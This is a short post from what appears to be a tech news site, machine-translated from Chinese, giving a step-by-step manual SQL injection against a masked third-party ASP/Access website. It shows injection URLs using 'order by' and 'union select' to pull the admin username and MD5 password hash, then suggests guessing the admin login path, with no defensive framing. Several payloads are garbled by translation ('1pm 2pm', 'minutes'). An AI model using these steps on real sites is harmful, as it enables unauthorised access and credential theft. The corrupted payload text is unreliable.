Shulou(Shulou.com)06/01 Report--

See a lot of script boy, tool party ah D, Ming boy, pangolin sweep around the website, get a background or something, in fact, the foundation is the most important, today I will talk about manual injection into a site.

Target URL: http://www.******.com/about.asp?id=1

1. First of all, it is very simple to confirm whether there is integer injection here. Url is followed by 'and 1, and 1, 2, without going into details. At the same time, we also determined that this is the database of Access.

two。 Using order by to judge how many table items there are.

Http://www.******.com/about.asp?id=1 order by 4 (here 5 error reports, 4 correct, that's 4)

3. Then test the display bit, 2 and 3 bits can be displayed.

Http://www.******.com/about.asp?id=1 and 1pm 2 union select 1pm 2pm 3pm 4 from admin

4. Guess the field value in the display bit; the table name here, the field name is tried based on experience; there are only a few common ones; we got the user name and password (MD5 encrypted)

Http://www.******.com/about.asp?id=1 and 1 minutes 2 union select 1 union select username 3 4 from admin

Http://www.******.com/about.asp?id=1 and 1 minute 2 union select 1 union select password3 4 from admin

5. After getting the user name and password, look for the background, common admin/login/manager/admin_login and so on can have a try, successfully login, done. We'll talk about it after the promotion of power.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.